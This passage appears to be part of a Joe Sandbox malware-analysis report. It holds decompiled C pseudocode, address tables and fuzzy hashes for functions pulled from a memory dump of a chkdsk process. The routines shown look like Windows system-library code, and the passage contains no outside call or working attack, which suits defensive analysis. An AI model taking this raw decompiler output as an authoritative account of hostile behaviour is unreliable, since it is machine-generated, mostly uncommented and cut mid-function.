						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04E3FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4e78724 & 0x00000008) != 0) {
						E04E452F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04E515B5(0x4e78ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                      0x04e50eb7
                                                      0x04e50eb9
                                                      0x04e50ec0
                                                      0x04e50ec2
                                                      0x04e50ecd
                                                      0x04e5105b
                                                      0x04e5105b
                                                      0x04e51061
                                                      0x04e51066
                                                      0x04e51066
                                                      0x04e5106b
                                                      0x04e51073
                                                      0x04e51073
                                                      0x04e50ed3
                                                      0x04e50ed6
                                                      0x04e50edc
                                                      0x04e50ee0
                                                      0x04e50ee7
                                                      0x04e50ef0
                                                      0x04e50ef5
                                                      0x04e50efa
                                                      0x04e50efc
                                                      0x04e50efd
                                                      0x04e50f03
                                                      0x04e50f04
                                                      0x04e50f06
                                                      0x04e50f07
                                                      0x04e50f09
                                                      0x04e50f0e
                                                      0x04e50f14
                                                      0x04e50f23
                                                      0x04e50f2d
                                                      0x04e50f34
                                                      0x04e50f34
                                                      0x04e50f14
                                                      0x04e50f52
                                                      0x00000000
                                                      0x00000000
                                                      0x04e50f58
                                                      0x04e50f73
                                                      0x04e50f74
                                                      0x04e50f79
                                                      0x04e50f7d
                                                      0x04e50f80
                                                      0x04e50f86
                                                      0x04e50fab
                                                      0x04e50fb5
                                                      0x04e50fc6
                                                      0x04e50fd1
                                                      0x04e50fe3
                                                      0x04e50fd3
                                                      0x04e50fdc
                                                      0x04e50fdc
                                                      0x04e50feb
                                                      0x04e51009
                                                      0x04e51009
                                                      0x04e51015
                                                      0x04e51027
                                                      0x04e51017
                                                      0x04e51020
                                                      0x04e51020
                                                      0x04e5102f
                                                      0x04e5103c
                                                      0x04e5103c
                                                      0x04e51048
                                                      0x04e51050
                                                      0x04e51050
                                                      0x04e51055
                                                      0x00000000
                                                      0x04e51055
                                                      0x04e50f88
                                                      0x04e50f9e
                                                      0x04e50fa2
                                                      0x04e50fa9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e50fa9
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: af22593461f5fbaea86017d80ff29abd540f78d20ea1bec82272f662201a7b46
                                                      • Instruction ID: 359955cd586c0b569272cae7a8dbbe6ab7db631c878482ee843aef1bbb5a5bd8
                                                      • Opcode Fuzzy Hash: af22593461f5fbaea86017d80ff29abd540f78d20ea1bec82272f662201a7b46
                                                      • Instruction Fuzzy Hash: 9051AD716043429FE725DF28D884B2BB7E5EBC4718F045A2DF996972A0D770F805CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E04DBF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04DA4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04DC9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04DC9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04DC95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x302bc81a
							_t109 = L04DA4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000302b
								E04DCF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000302b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04DC95D0();
										L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                      0x04dbf0d3
                                                      0x04dbf0d9
                                                      0x04dbf0e0
                                                      0x04dbf0e7
                                                      0x04dbf0f2
                                                      0x04dbf0f4
                                                      0x04dbf0f8
                                                      0x04dbf100
                                                      0x04dbf108
                                                      0x04dbf10d
                                                      0x04dbf115
                                                      0x04dbf116
                                                      0x04dbf11f
                                                      0x04dbf123
                                                      0x04dbf124
                                                      0x04dbf12c
                                                      0x04dbf130
                                                      0x04dbf134
                                                      0x04dbf13d
                                                      0x04dbf144
                                                      0x04dbf14b
                                                      0x04dbf152
                                                      0x04dfbab0
                                                      0x04dfbab0
                                                      0x04dbf158
                                                      0x04dbf158
                                                      0x04dbf15a
                                                      0x04dbf160
                                                      0x04dbf165
                                                      0x04dbf166
                                                      0x04dbf16f
                                                      0x04dbf173
                                                      0x04dfbaa7
                                                      0x04dfbaa7
                                                      0x04dfbaab
                                                      0x00000000
                                                      0x04dbf179
                                                      0x04dbf179
                                                      0x04dbf18d
                                                      0x04dbf191
                                                      0x04dfbaa2
                                                      0x00000000
                                                      0x04dbf197
                                                      0x04dbf19b
                                                      0x04dbf1a2
                                                      0x04dbf1a9
                                                      0x04dbf1af
                                                      0x04dbf1b2
                                                      0x04dbf1b6
                                                      0x04dbf1b9
                                                      0x04dbf1c0
                                                      0x04dbf1c4
                                                      0x04dbf1d8
                                                      0x04dbf1df
                                                      0x04dbf1e3
                                                      0x04dbf1e6
                                                      0x04dbf1eb
                                                      0x04dbf1ee
                                                      0x04dbf1f4
                                                      0x04dbf20f
                                                      0x04dfbab7
                                                      0x04dfbabb
                                                      0x04dfbacc
                                                      0x04dfbad1
                                                      0x04dbf215
                                                      0x04dbf218
                                                      0x04dbf226
                                                      0x04dbf22b
                                                      0x00000000
                                                      0x04dbf22b
                                                      0x04dbf1f6
                                                      0x04dbf1f6
                                                      0x04dbf1f9
                                                      0x04dbf1fb
                                                      0x04dbf1fb
                                                      0x04dbf1f4
                                                      0x04dbf191
                                                      0x04dbf173
                                                      0x04dbf152
                                                      0x04dbf203

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction ID: 12f21eafd31e6fc52d7b54f50fb2b01d49d0231adce88f6a4ba5280972e70eb4
                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction Fuzzy Hash: 60516C71604711AFD321DF29C840A6BBBF8FF48754F00892EF99697690E7B4E914CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E03540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E04E03540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4e7d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04DC0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04E03706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04DCFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04E03540;
						E04DCFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04DDDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04E10C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04DC97C0();
					}
					return E04DCB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04E03971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04E03884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04DCFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04DC9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04E03787(_a4,  &_v352, _t80);
						}
					}
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04DC95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                      0x04e03552
                                                      0x04e0355a
                                                      0x04e0355d
                                                      0x04e03566
                                                      0x04e03567
                                                      0x04e0357e
                                                      0x04e0358f
                                                      0x04e035a1
                                                      0x04e035a5
                                                      0x04e0366b
                                                      0x04e0366b
                                                      0x04e0366d
                                                      0x04e03672
                                                      0x04e03679
                                                      0x04e03685
                                                      0x04e0368d
                                                      0x04e0369d
                                                      0x04e036a7
                                                      0x04e036b8
                                                      0x04e036c6
                                                      0x04e036c7
                                                      0x04e036dc
                                                      0x04e036e1
                                                      0x04e036e7
                                                      0x04e036e9
                                                      0x04e036e9
                                                      0x04e03703
                                                      0x04e03703
                                                      0x04e035b5
                                                      0x04e035c0
                                                      0x04e035c4
                                                      0x00000000
                                                      0x00000000
                                                      0x04e035ca
                                                      0x04e035d7
                                                      0x04e035e2
                                                      0x04e035e6
                                                      0x04e035e8
                                                      0x04e035f5
                                                      0x04e035fa
                                                      0x04e03603
                                                      0x04e03604
                                                      0x04e03609
                                                      0x04e0360a
                                                      0x04e03612
                                                      0x04e03613
                                                      0x04e0361e
                                                      0x04e03622
                                                      0x04e03628
                                                      0x04e0362f
                                                      0x04e0362f
                                                      0x04e03636
                                                      0x04e03638
                                                      0x04e0363b
                                                      0x04e03642
                                                      0x04e03642
                                                      0x04e03636
                                                      0x04e03657
                                                      0x04e03657
                                                      0x04e0365c
                                                      0x04e03662
                                                      0x04e03669
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: BinaryHash
                                                      • API String ID: 2994545307-2202222882
                                                      • Opcode ID: c8775016572c92fcc0ec9820613f8f73ee076271a3029efe9ccf323ba53a9025
                                                      • Instruction ID: c49d6372b38f3c92e324a09febd61599317f37ef965c3e736bd51ca63023e8e4
                                                      • Opcode Fuzzy Hash: c8775016572c92fcc0ec9820613f8f73ee076271a3029efe9ccf323ba53a9025
                                                      • Instruction Fuzzy Hash: 8A4136F1D0152D9AEB21DB50DC84FDEB77CDB44718F008595AA19A7280DB30AE888FA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E505AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E04E505AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E04E507DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04DC9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E04E4A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E04E4A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04E51293(_t79, _v40, E04E507DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04DA7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E04E4138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                      0x04e505c5
                                                      0x04e505ca
                                                      0x04e505d3
                                                      0x04e506db
                                                      0x04e506db
                                                      0x04e506dd
                                                      0x04e506e3
                                                      0x04e506e3
                                                      0x04e505dd
                                                      0x04e505e7
                                                      0x04e505f6
                                                      0x04e50600
                                                      0x04e50607
                                                      0x04e50610
                                                      0x04e50615
                                                      0x04e5061a
                                                      0x04e5061c
                                                      0x04e5061e
                                                      0x04e50624
                                                      0x04e50625
                                                      0x04e50627
                                                      0x04e50628
                                                      0x04e50631
                                                      0x04e50640
                                                      0x04e5064d
                                                      0x04e50654
                                                      0x04e50654
                                                      0x04e50631
                                                      0x04e5066d
                                                      0x04e50674
                                                      0x00000000
                                                      0x00000000
                                                      0x04e50692
                                                      0x04e5069e
                                                      0x04e506b0
                                                      0x04e506a0
                                                      0x04e506a9
                                                      0x04e506a9
                                                      0x04e506b8
                                                      0x04e506d6
                                                      0x04e506d6
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction ID: 47b9ea9b915f6c042e8c419aeeecc807db4e849899cbaf59c2899e8bf134aa27
                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction Fuzzy Hash: F831E032704305ABE720DF24CC85F9A77D9EBC4768F044629FD58AB690D6B0F904CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E03884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E04E03884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04DC9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04DA4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04DC9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                      0x04e03893
                                                      0x04e03896
                                                      0x04e03899
                                                      0x04e0389f
                                                      0x04e038a0
                                                      0x04e038a4
                                                      0x04e038a9
                                                      0x04e038ac
                                                      0x04e038ad
                                                      0x04e038ae
                                                      0x04e038af
                                                      0x04e038b1
                                                      0x04e038b4
                                                      0x04e038bb
                                                      0x04e038bc
                                                      0x04e038bd
                                                      0x04e038c4
                                                      0x04e038c8
                                                      0x04e038ca
                                                      0x04e038ca
                                                      0x04e038d5
                                                      0x04e0393e
                                                      0x04e03940
                                                      0x04e03942
                                                      0x04e03952
                                                      0x04e03954
                                                      0x04e03961
                                                      0x04e03961
                                                      0x04e03967
                                                      0x04e0396e
                                                      0x04e0396e
                                                      0x04e03947
                                                      0x04e0394c
                                                      0x00000000
                                                      0x04e0394c
                                                      0x04e038ea
                                                      0x04e038ee
                                                      0x04e038f8
                                                      0x04e038f9
                                                      0x04e038ff
                                                      0x04e03900
                                                      0x04e03902
                                                      0x04e03903
                                                      0x04e0390b
                                                      0x04e0390f
                                                      0x04e03950
                                                      0x00000000
                                                      0x04e03950
                                                      0x04e03915
                                                      0x04e0391d
                                                      0x04e0391d
                                                      0x04e03922
                                                      0x04e03926
                                                      0x00000000
                                                      0x04e03928
                                                      0x04e0392b
                                                      0x04e0392b
                                                      0x04e03935
                                                      0x04e03937
                                                      0x04e03937
                                                      0x00000000
                                                      0x04e03935
                                                      0x04e03926
                                                      0x04e038f0
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: BinaryName
                                                      • API String ID: 2994545307-215506332
                                                      • Opcode ID: cd911388c9cd1615e65591adf5e223965756f901be2eba04132cd1a68d0417d2
                                                      • Instruction ID: 5afbb0047eeebdf918dffec27584d6579ead990f7caebed644a45d2cea47b02c
                                                      • Opcode Fuzzy Hash: cd911388c9cd1615e65591adf5e223965756f901be2eba04132cd1a68d0417d2
                                                      • Instruction Fuzzy Hash: C0310572E0050AAFEB25DB58C945DBBB774EB40B24F118169ED25A76C0D730BE40C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 33%
                                                      			E04DBD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4e7d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04DA4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04DCB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04DC98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04DC95D0();
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                      0x04dbd29c
                                                      0x04dbd2a6
                                                      0x04dbd2b1
                                                      0x04dbd2b5
                                                      0x04dbd2b6
                                                      0x04dbd2bc
                                                      0x04dbd2bd
                                                      0x04dbd2be
                                                      0x04dbd2bf
                                                      0x04dbd2c2
                                                      0x04dbd2c4
                                                      0x04dbd2cc
                                                      0x04dbd384
                                                      0x04dbd34b
                                                      0x04dbd34f
                                                      0x04dbd350
                                                      0x04dbd351
                                                      0x04dbd35c
                                                      0x04dbd35c
                                                      0x04dbd2d6
                                                      0x04dbd2da
                                                      0x04dbd2e1
                                                      0x04dbd361
                                                      0x04dbd369
                                                      0x04dbd36d
                                                      0x04dbd2e3
                                                      0x04dbd2e3
                                                      0x04dbd2e3
                                                      0x04dbd2e5
                                                      0x04dbd2ed
                                                      0x04dbd2f5
                                                      0x04dbd2fa
                                                      0x04dbd302
                                                      0x04dbd303
                                                      0x04dbd30b
                                                      0x04dbd30f
                                                      0x04dbd313
                                                      0x04dbd318
                                                      0x04dbd31c
                                                      0x04dbd320
                                                      0x04dbd379
                                                      0x04dbd37d
                                                      0x00000000
                                                      0x00000000
                                                      0x04dfaffe
                                                      0x04dfb001
                                                      0x04dfb011
                                                      0x00000000
                                                      0x04dbd322
                                                      0x04dbd322
                                                      0x04dbd330
                                                      0x04dbd337
                                                      0x04dbd35d
                                                      0x04dbd339
                                                      0x04dbd33f
                                                      0x04dbd38c
                                                      0x04dbd38c
                                                      0x04dbd33f
                                                      0x04dbd349
                                                      0x00000000
                                                      0x04dbd349

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4f7bc29cd55a152e69625ac7e14cebbc41643b4a313795c40e14924fe149cfee
                                                      • Instruction ID: 318ea455d96ba1a565f834d325a541256c6cc24f2fade5d5a08717270cadc623
                                                      • Opcode Fuzzy Hash: 4f7bc29cd55a152e69625ac7e14cebbc41643b4a313795c40e14924fe149cfee
                                                      • Instruction Fuzzy Hash: 42316EB1608345DFD711DF28C9809ABBBE9EB85654F00092EF9D693311E639ED04DBE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D91B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E04D91B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
